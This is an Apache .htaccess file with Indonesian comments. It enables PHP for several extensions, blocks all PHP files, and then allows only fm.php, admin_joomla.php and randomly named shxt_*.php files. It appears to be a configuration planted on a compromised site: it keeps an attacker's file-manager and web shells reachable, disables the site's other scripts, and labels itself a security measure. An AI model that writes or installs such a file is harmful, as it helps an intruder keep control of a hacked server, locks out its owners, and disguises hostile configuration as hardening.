# Daftar ekstensi yang akan dikenali sebagai PHP
AddType application/x-httpd-php .php .PHP .phtml .phar

# Mengizinkan akses dari semua
Satisfy Any
Allow from all

# Blokir semua file PHP kecuali yang diizinkan
<FilesMatch "\.(php|PHP|phtml|phar)$">
    Order allow,deny
    Deny from all
</FilesMatch>

# Izinkan akses ke file spesifik (contoh: fm.php, admin_joomla.php)
<FilesMatch "^(fm|admin_joomla|shxt_[a-z0-9]+)\.(php|PHP|phtml|phar)$">
    Order allow,deny
    Allow from all
</FilesMatch>

# Konfigurasi tambahan untuk keamanan
Options -Indexes
